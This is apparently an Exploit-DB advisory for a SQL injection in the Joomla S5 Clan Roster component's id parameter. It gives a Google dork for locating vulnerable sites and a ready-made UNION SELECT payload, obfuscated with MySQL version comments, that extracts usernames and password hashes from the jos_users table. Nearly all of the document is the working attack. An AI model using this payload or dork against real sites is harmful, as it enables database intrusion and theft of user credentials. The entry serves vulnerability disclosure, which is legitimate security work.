Joomla S5 Clan Roster com_s5clanroster index.php id param - SQL Injection

2013-05-13T00:00:00
ID EDB-ID:25410
Type exploitdb
Reporter AtT4CKxT3rR0r1ST
Modified 2013-05-13T00:00:00

Description

Joomla S5 Clan Roster com_s5clanroster (index.php id param) - SQL Injection. Webapps exploit for php platform

                                        
                                            Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
####################################################################
===[ Exploit ]===

Sql Injection:
==============

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
####################################################################